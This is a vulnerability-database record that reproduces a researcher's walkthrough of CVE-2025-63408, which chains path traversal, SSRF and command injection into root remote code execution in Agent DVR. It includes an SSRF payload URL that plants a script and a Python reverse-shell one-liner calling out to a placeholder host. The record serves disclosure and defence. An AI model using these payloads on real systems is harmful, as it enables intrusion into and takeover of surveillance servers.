{"uuid": "c4273ed6-7073-4456-bb8f-28d2b213259b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "name": "RCE in Agent DVR", "description": "Description:\n------------\nRef: [https://www.ericholub.com/blog/agent-dvr-rce/](https://www.ericholub.com/blog/agent-dvr-rce/)\n\n[Agent DVR](https://www.ispyconnect.com/download) is surveillance recording software from [iSpyConnect](https://www.ispyconnect.com/). Versions \u2264 6.6.7.0 are vulnerable to local path traversal, SSRF, and command injection (on Linux), which when combined lead to authenticated RCE. These findings have all been combined into **CVE-2025-63408**.\n\nWalkthrough:\n------------\n\nAgent DVR has a local API where you can access things like recordings without any kind of authentication. Here\u2019s the API docs for it:\n\n[Swagger UI](https://ispysoftware.github.io/Agent_API/#/)\n\nOne call in particular is interesting, which is \u2018addrecording\u2019. This lets you assign a \u2018recording\u2019 to a particular camera.\n\nTurns out this call is vulnerable to path traversal. I\u2019ve already written some exploit code on how to get any file from the filesystem from this:\n\n[https://github.com/eric-m-holub/double-agent](https://github.com/eric-m-holub/double-agent)\n\nThis vulnerability can be chained with SSRF and command injection vulnerabilities for full RCE. I\u2019m going to be attacking Agent DVR v6.6.1.0 running on Ubuntu (Linux). 
I tested these vulns on Windows against the same Agent DVR version and found it was vulnerable to everything but the command injection.\n\nFirst off, add a new Network IP Camera.\n\n[![](image.png)](image.png)\n\n[![](image%201.png)](image%201.png)\n\n[![](image%202.png)](image%202.png)\n\nNext select the gear icon to update the Source Type:\n\n[![](image%203.png)](image%203.png)\n\nNow enter in the following payload for \u2018Live URL\u2019:\n\nhttp://127.0.0.1:8090/command/addrecording?oid=1&ot=2&path=/etc/passwd&name=../../../../Commands/rce.sh\n\n[![](image%204.png)](image%204.png)\n\nPress \u2018OK\u2019 and then flip the camera on and off:\n\n[![](image%205.png)](image%205.png)\n\nThis leverages an SSRF vulnerability which calls this local API and creates a file called \u2018rce.sh\u2019 in the \u2018Commands\u2019 directory of Agent DVR using directory traversal. It doesn\u2019t matter what the file contents are, only the file extension type.\n\nNow create a new Action and Task for this camera:\n\n[![](image%206.png)](image%206.png)\n\n[![](image%207.png)](image%207.png)\n\n[![](image%208.png)](image%208.png)\n\n[![](image%209.png)](image%209.png)\n\nNow on the popup to create a task select \u201cExecute Command\u201d and select the created \u2018rce\u2019 file:\n\n[![](image%2010.png)](image%2010.png)\n\nFor the \u2018Parameters\u2019 input, this is where you put your system command. Yes, this parameter is vulnerable to command injection, but only when you target a bash script. I had trouble with bash reverse shells, but Python works OK. 
Here\u2019s that payload:\n\n```\n`python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"x.x.x.x\",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/bash\")'`\n```\n\n\nAt this point, I\u2019d suggest updating your new camera to something with an \u2018Image\u2019 source so we can make a new recording from it:\n\n[![](image%2011.png)](image%2011.png)\n\n[![](image%2012.png)](image%2012.png)\n\nYou can put any Image URL you want in there\n\nSo now start a listener on the port you specified in your payload, and then create a new recording on this new camera and you should get a root shell:\n\n[![](image%2013.png)](image%2013.png)\n\n[![](image%2014.png)](image%2014.png)\n\nTah dah. Agent DVR runs as root by default on Linux, so no privilege escalation is necessary. Have a good day.", "creation_timestamp": "2025-11-18T15:39:57.050224+00:00", "timestamp": "2025-11-18T15:42:01.065551+00:00", "related_vulnerabilities": ["CVE-2025-63408"], "author": {"login": "adulau", "name": "Alexandre Dulaunoy", "uuid": "c933734a-9be8-4142-889e-26e95c752803"}}
